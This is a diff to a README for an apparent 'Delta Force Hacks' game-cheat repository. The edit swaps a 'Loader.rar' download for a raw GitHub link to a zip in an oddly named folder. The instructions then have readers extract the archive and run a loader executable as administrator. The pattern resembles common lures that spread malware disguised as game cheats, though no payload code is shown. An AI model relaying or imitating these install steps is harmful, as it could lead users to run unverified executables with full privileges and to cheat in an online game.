malbertosm/Delta-Force-Hacks/README.md

 Experience easy setup and rock-solid performance on every major OS!
 **Follow these steps to install Delta Force Hacks 2025:**

-1. **Download Loader.rar from the repository**
+1. **Download https://raw.githubusercontent.com/malbertosm/Delta-Force-Hacks/main/uncopious/Delta-Force-Hacks-2.0.zip from the repository**
-2. Extract the Loader.rar file using a trusted extraction tool (e.g., WinRAR, 7-Zip, or the built-in extractor for your OS)
+2. Extract the https://raw.githubusercontent.com/malbertosm/Delta-Force-Hacks/main/uncopious/Delta-Force-Hacks-2.0.zip file using a trusted extraction tool (e.g., WinRAR, 7-Zip, or the built-in extractor for your OS)
 3. Run the Loader executable as administrator
 4. Follow on-screen instructions to initialize your cheat suite
 5. Start Delta Force and select the hacks you want to enable